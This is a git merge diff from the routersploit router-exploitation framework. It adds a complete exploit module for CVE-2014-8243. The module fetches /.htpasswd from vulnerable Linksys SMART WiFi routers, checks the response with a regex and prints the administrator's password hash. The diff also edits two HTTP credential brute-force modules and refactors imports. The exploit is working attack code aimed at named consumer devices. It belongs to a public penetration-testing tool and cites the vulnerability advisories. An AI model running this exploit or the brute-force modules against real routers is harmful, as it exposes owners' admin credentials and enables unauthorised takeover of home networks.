Merge branch 'master' of https://github.com/reverse-shell/routersploit into multi-rom0

routersploit/modules/creds/http_basic_bruteforce.py

@@ -37,7 +37,7 @@ class Exploit(exploits.Exploit):
         ],
     }
 
-    target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(80, 'Target port')
 
     threads = exploits.Option(8, 'Numbers of threads')

routersploit/modules/creds/http_basic_default.py

@@ -36,7 +36,7 @@ class Exploit(exploits.Exploit):
         ],
     }
 
-    target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(80, 'Target port')
     threads = exploits.Option(8, 'Number of threads')
     defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')

routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py

+import re
+
+from routersploit import (
+    exploits,
+    mute,
+    validators,
+    http_request,
+    print_info,
+    print_success,
+    print_error,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit Linksys SMART WiFi firmware
+    If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash
+    """
+    __info__ = {
+        'name': 'Linksys SMART WiFi Password Disclosure',
+        'authors': [
+            'Sijmen Ruwhof',  # vulnerability discovery
+            '0BuRner',  # routersploit module
+        ],
+        'description': 'Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. If target is vulnerable administrator\'s MD5 passsword is retrieved.',
+        'references': [
+            'https://www.kb.cert.org/vuls/id/447516',
+            'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers',
+            'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243',
+            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243',
+        ],
+        'devices': [
+            'Linksys EA2700 < Ver.1.1.40 (Build 162751)',
+            'Linksys EA3500 < Ver.1.1.40 (Build 162464)',
+            'Linksys E4200v2 < Ver.2.1.41 (Build 162351)',
+            'Linksys EA4500 < Ver.2.1.41 (Build 162351)',
+            'Linksys EA6200 < Ver.1.1.41 (Build 162599)',
+            'Linksys EA6300 < Ver.1.1.40 (Build 160989)',
+            'Linksys EA6400 < Ver.1.1.40 (Build 160989)',
+            'Linksys EA6500 < Ver.1.1.40 (Build 160989)',
+            'Linksys EA6700 < Ver.1.1.40 (Build 160989)',
+            'Linksys EA6900 < Ver.1.1.42 (Build 161129)',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+
+    def run(self):
+        if self.check():
+            print_success("Target seems to be vulnerable")
+
+            url = "{}:{}/.htpasswd".format(self.target, self.port)
+            response = http_request(method="GET", url=url)
+            if response is None:
+                print_error("Exploit failed - connection error")
+                return
+
+            print_info("Unix crypt hash: $id$salt$hashed")  # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
+            print_success("Hash found:", response.text)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        url = "{}:{}/.htpasswd".format(self.target, self.port)
+        response = http_request(method="GET", url=url)
+
+        if response is not None and response.status_code == 200:
+            res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text)
+            if len(res):
+                return True
+
+        return False

routersploit/utils.py → routersploit/utils/__init__.py

-from __future__ import print_function
 from __future__ import absolute_import
+from __future__ import print_function
 
-import threading
-import os
-import sys
-import re
 import collections
-import random
-import string
+import errno
 import importlib
+import os
+import random
+import re
 import select
 import socket
-import errno
-from functools import wraps
-from distutils.util import strtobool
+import string
+import sys
+import threading
 from abc import ABCMeta, abstractmethod
+from distutils.util import strtobool
+from functools import wraps
 
 import requests
 
-from .printer import printer_queue, thread_output_stream
-from .exceptions import RoutersploitException
-from . import modules as rsf_modules
+from .. import modules as rsf_modules
+from ..exceptions import RoutersploitException
+from ..printer import printer_queue, thread_output_stream
 
 MODULES_DIR = rsf_modules.__path__[0]
 CREDS_DIR = os.path.join(MODULES_DIR, 'creds')
@@ -543,7 +543,7 @@ def tokenize(token_specification, text):
 
 
 def create_exploit(path):  # TODO: cover with tests
-    from .templates import exploit
+    from ..templates import exploit
 
     parts = path.split(os.sep)
     module_type, name = parts[0], parts[-1]